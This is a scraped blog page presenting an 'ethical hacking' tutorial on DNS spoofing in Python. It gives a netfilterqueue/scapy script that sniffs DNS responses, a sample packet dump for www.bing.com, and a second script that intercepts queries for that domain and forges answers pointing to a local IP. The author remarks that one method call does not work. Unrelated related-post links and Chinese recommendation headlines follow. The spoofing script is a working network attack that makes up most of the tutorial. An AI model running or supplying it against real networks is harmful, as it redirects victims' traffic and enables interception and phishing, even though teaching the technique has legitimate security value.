What is DNS Spoofing

Sniff the DNSRR packet and show on the terminal.

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import DNSRR,IP

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSRR):

        print(scapy_packet.show())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Analyze the following DNSRR records.

###[ IP ]###

  version   = 4

  ihl       = 5

  tos       = 0x0

  len       = 218

  id        = 0

  flags     = DF

  frag      = 0

  ttl       = 64

  proto     = udp

  chksum    = 0x25e8

  src       = 10.0.0.1

  dst       = 10.0.0.43

  \options   \

###[ UDP ]###

     sport     = domain

     dport     = 42647

     len       = 198

     chksum    = 0x9388

###[ DNS ]###

        id        = 40073

        qr        = 1

        opcode    = QUERY

        aa        = 0

        tc        = 0

        rd        = 1

        ra        = 1

        z         = 0

        ad        = 0

        cd        = 0

        rcode     = ok

        qdcount   = 1

        ancount   = 3

        nscount   = 1

        arcount   = 0

        \qd        \

         |###[ DNS Question Record ]###

         |  qname     = 'www.bing.com.'

         |  qtype     = AAAA

         |  qclass    = IN

        \an        \

         |###[ DNS Resource Record ]###

         |  rrname    = 'www.bing.com.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 2063

         |  rdlen     = None

         |  rdata     = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 414

         |  rdlen     = None

         |  rdata     = 'cn.cn-0001.cn-msedge.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'cn.cn-0001.cn-msedge.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  rdata     = 'cn-0001.cn-msedge.net.'

        \ns        \

         |###[ DNS SOA Resource Record ]###

         |  rrname    = 'cn-msedge.net.'

         |  type      = SOA

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  mname     = 'ns1.cn-msedge.net.'

         |  rname     = 'msnhst.microsoft.com.'

         |  serial    = 2017032701

         |  refresh   = 1800

         |  retry     = 900

         |  expire    = 2419200

         |  minimum   = 240

        ar        = None

Redirecting DNS Responses

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import *

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSQR):

        qname = scapy_packet[DNSQR].qname

        if "www.bing.com" in qname.decode(errors='ignore'):

            print("[+] Spoofing target")

            answer = DNSRR(rrname=qname, rdata="10.0.0.43")

            scapy_packet[DNS].an = answer

            scapy_packet[DNS].ancount = 1

            del scapy_packet[IP].len

            del scapy_packet[IP].chksum

            del scapy_packet[UDP].chksum

            del scapy_packet[UDP].len

            packet.set_payload(str(scapy_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

The set_payload() method does not work....

https://github.com/kti/python-netfilterqueue/issues/30

Python Ethical Hacking - DNS Spoofing的更多相关文章

  1. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  2. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  4. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  5. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  6. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  7. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  8. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

  9. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

随机推荐

  1. Day7-微信小程序实战-交友小程序首页UI

    一般都是直接用微信提供的组件来进行布局的 在小程序中最好少用id,尽量用class 轮播图就是直接用swiper 直接在微信开发者文档里面->组件->swiper->示例代码 < ...

  2. WeChair项目Alpha冲刺(1/10)

    团队项目进行情况 1.昨日进展    因为是Alpha冲刺第一天,所以昨日进展无 2.今日安排 前端:完成前端页面的首页html+css部分 后端:搭建好SpringBoot项目以及完成实体类代码的编 ...

  3. 我们是如何做go语言系统测试覆盖率收集的?

    工程效能领域,测试覆盖率度量总是绕不开的话题,我们也不例外.在七牛云,我们主要使用go语言构建云服务,在考虑系统测试覆盖率时,最早也是通过围绕原生go test -c -cover的能力来构建.这个方 ...

  4. 吃货联盟订餐系统 源代码 Java初级小项目

    咳咳,今天博主给大家写一个小的项目:吃货联盟订餐系统.博主不是大神(互联网架构师的路上ing),也是小白一个,不过是刚入门的小白^_^.项目功能也很简单:只是模拟日常的订餐流程呦,所以有错误以及功能不 ...

  5. jni 字符串的梳理

    1.实现的功能是java层传递一个字符串到c层2.c层首先将jstring类型转换成char*类型3.c层对字符串进行处理之后,将处理之后的char*类型转换成jstring类型返回给上层的 pack ...

  6. 暑假集训Day2 状压dp 特殊方格棋盘

    首先声明 : 这是个很easy的题 可这和我会做有什么关系 题目大意: 在n*n的方格棋盘上放置n个车,某些格子不能放,求使它们不能互相攻击的方案总数. 注意:同一行或同一列只能有一个车,否则会相互攻 ...

  7. 分享 HT 实用技巧:实现指南针和 3D 魔方导航

    前言 三维场景时常需要一个导航标识,用来确定场景所处的方位. 一般有两种表现形式:指南针.小方盒(方位魔方). 参考一下百度百科中的 maya 界面,可以看到右上角有一个标识方位的小盒子,说的就是它: ...

  8. 字符串String和list集合判空验证

    1`字符串判断处理: 结论: 当if判断条件为两个,并且它们两个为或的关系,如果第一个条件为false,则继续第二个条件的判断:如果第一个条件为true,该例子不足以说明是否判断第二个条件, 最终可以 ...

  9. 廖雪峰Python教学课后作业---datetime

    # -*- coding: utf-8 -*- import re from datetime import datetime, timezone, timedelta def to_timestam ...

  10. (私人收藏)精美PPT模板

    精美PPT模板 https://pan.baidu.com/s/1vsRnX5h7t3MZ7qdrFvuI1wsucr